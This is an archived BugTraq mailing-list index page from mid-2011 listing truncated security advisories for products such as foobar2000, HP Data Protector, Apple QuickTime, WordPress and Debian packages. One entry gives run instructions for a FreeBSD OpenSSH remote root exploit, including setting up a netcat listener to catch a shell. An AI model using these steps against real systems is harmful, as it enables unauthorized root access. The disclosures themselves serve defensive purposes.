BugTraq Mode:
(Page 415 of 1747)
Integer overflow in foobar2000 1.1.7 2011-07-04
Luigi Auriemma (aluigi autistici org)
#######################################################################

Luigi Auriemma

Application: foobar2000
http://www.foobar2000.org
Versions: <= 1.1.7
Platforms: Windows
Bug: integer overflow
Date: 03 Jul 2011
Author: L

bcksrvr format string in Sybase Adaptive Server 15.5 2011-06-27
Luigi Auriemma (aluigi autistici org)
#######################################################################

Luigi Auriemma

Application: Sybase Adaptive Server
http://www.sybase.com/products/databasemanagement/adaptiveserverenterprise
Versions: <= 15.5
Platforms: Solaris, Windows, Li

Arbitrary files deletion in HP OpenView Performance Agent 2011-06-27
Luigi Auriemma (aluigi autistici org)
#######################################################################

Luigi Auriemma

Application: HP OpenView Performance Agent
http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-937022
Versions: ovbbccb.exe <= 6.20.50.0
Platfo

Multiple Cross-Site Scripting vulnerabilities in WebCalendar 2011-07-04
sschurtz t-online de
Advisory: Multiple Cross-Site Scripting vulnerabilities in WebCalendar
Advisory ID: SSCHADV2011-008
Author: Stefan Schurtz
Affected Software: Version 1.2.3 and probably prior versions
Vendor URL: http://www.k5n.us/webcalendar.php
Vendor Status: informed
CVE

[SECURITY] [DSA 2271-1] curl security update 2011-07-02
Giuseppe Iuculano (iuculano debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2271-1 security (at) debian (dot) org
http://www.debian.org/security/ Giuseppe Iuculano
July 02, 2011

ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability 2011-07-01
ZDI Disclosures (zdi-disclosures tippingpoint com)
ZDI-11-232: HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-232

July 1, 2011

-- CVE ID:
CVE-2011-1867

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewle

[security bulletin] HPSB3C02687 SSRT100377 rev.1 - HP Intelligent Management Center User Access Manager (UAM) and Endpoint Admission Defense (EAD), Remote Execution of Arbitrary Code 2011-07-01
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02901775
Version: 1

HPSB3C02687 SSRT100377 rev.1 - HP Intelligent Management Center User Access Manager (UAM) and Endpoint Admission Defense (EAD), Remote Execution of Arbitrary Code

NOTICE: The

SEC Consult SA-20110701-0 :: Multiple SQL injection vulnerabilities in WordPress 2011-07-01
SEC Consult Vulnerability Lab (research sec-consult com)
SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
=======================================================================
title: Multiple SQL Injection Vulnerabilities
product: WordPress
vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
fix

Vega beta release: a new open-source web-application security assessment platform 2011-07-01
David Mirza (dma subgraph com)
Hey,

We've been quietly working for the last few months on a new platform for
scanning and pen-testing web applications. It's called Vega. It's
GUI-based, open source, and includes an automated scanner and
intercepting proxy. We launched the beta today at FISL12.

Vega is written in Java, based on

[SECURITY] [DSA 2270-1] qemu-kvm security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2270-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[SECURITY] [DSA 2269-1] iceape security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2269-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[SECURITY] [DSA 2262-2] php5 update 2011-07-01
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2266-2 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[SECURITY] [DSA 2268-1] iceweasel security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2268-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

[SECURITY] [DSA 2267-1] perl security update 2011-07-01
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2267-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
July 01, 2011

Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) 2011-07-01
HI-TECH . (isowarez isowarez isowarez googlemail com)
you can apply the patch using the diff if you don't want to run that.

2011/7/1 Benji <me (at) b3nji (dot) com>:
> So you want people to download your statically linked binary?
>
> On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
> <isowarez.isowarez.isowarez (at) googlemail (dot) com> wrote:
>>
>> OpenSSH FreeBSD Remote Root E

Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) 2011-07-01
HI-TECH . (isowarez isowarez isowarez googlemail com)
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found bel

NetBSD 5.1 libc/net multiple functions stack buffer overflow 2011-07-01
cxib securityreason com
[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/

Date:
- Dis.: 01.04.2011
- Pub.: 01.07.2011

CVE: CVE-2011-1656
CWE: CWE-121

Affected software:
- NetBSD 5.1 (fixed)

Affected functions:
- getservbyname(3)
- getservbyna

Re: [Full-disclosure] OpenSSH 3.5p1 Remote Root Exploit for FreeBSD 2011-07-01
Darren Tucker (dtucker zip com au)
This seems to be in libopie rather than sshd or libpam and happens
when the username is longer than OPIE_PRINCIPAL_MAX. I'm not sure
exactly where inside libopie it is, but commenting out pam_opie.so
seems to prevent it.

http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/pam_opi

Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used 2011-06-30
pierre ernst ca ibm com
Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix:

[security bulletin] HPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code 2011-06-29
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02872182
Version: 3

HPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon a

CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability 2011-06-29
CORE Security Technologies Advisories (advisories coresecurity com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

HP Data Protector EXEC_CMD Buffer Overflow Vulnerability

1. *Advisory Information*

Title: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
Advisory I

CORE-2011-0514: Multiple vulnerabilities in HP Data Protector 2011-06-29
CORE Security Technologies Advisories (advisories coresecurity com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

Multiple vulnerabilities in HP Data Protector

1. *Advisory Information*

Title: Multiple vulnerabilities in HP Data Protector
Advisory ID: CORE-2011-0514
Advi

Re: Resolved - NNT Change Tracker - Hard-Coded Encryption Key Originally posted as http://seclists.org/fulldisclosure/2011/May/460 2011-06-29
dennis brunnen gmail com
As is probably obvious to other readers, I did indeed notify NNT by email of the vulnerability before making it public - as mentioned in my initial disclosure. I'm not sure what possible reason anyone would have to say that if it were not true.

Glad to see you apparently did the right thing and even

ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)
ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-231

June 29, 2011

-- CVE ID:
CVE-2010-3790

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

--

ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)
ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-230

June 29, 2011

-- CVE ID:
CVE-2011-0211

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Qui

ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)
ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-229

June 29, 2011

-- CVE ID:
CVE-2011-0209

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- T

ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution Vulnerability 2011-06-29
ZDI Disclosures (zdi-disclosures tippingpoint com)
ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-228

June 29, 2011

-- CVE ID:
CVE-2011-0200

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Mail
Apple OS

Breaking the links: Exploiting the linker 2011-06-29
Tim Brown (timb nth-dimension org uk)
I've recently been working on a paper on Linux and POSIX linkers, the most
recent release of which can be found at:

* http://www.nth-dimension.org.uk/downloads.php?id=77

I'm particularly interested in feedback on references or threats that I may
have missed. As per the abstract, the aim of the

[SECURITY] [DSA 2266-1] php5 security update 2011-06-29
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2266-1 security (at) debian (dot) org
http://www.debian.org/security/ Moritz Muehlenhoff
June 29, 2011

Resolved - NNT Change Tracker - Hard-Coded Encryption Key - Originally posted as http://seclists.org/fulldisclosure/2011/May/460 2011-06-29
NNT Support (support nntws com)
Subject: Resolved - NNT Change Tracker - Hard-Coded Encryption Key -
Originally posted as http://seclists.org/fulldisclosure/2011/May/460

Background
-----------------

The product employs a portion of legacy code as referenced in the original
post. This is used for the product key and some database

Copyright 2010, SecurityFocus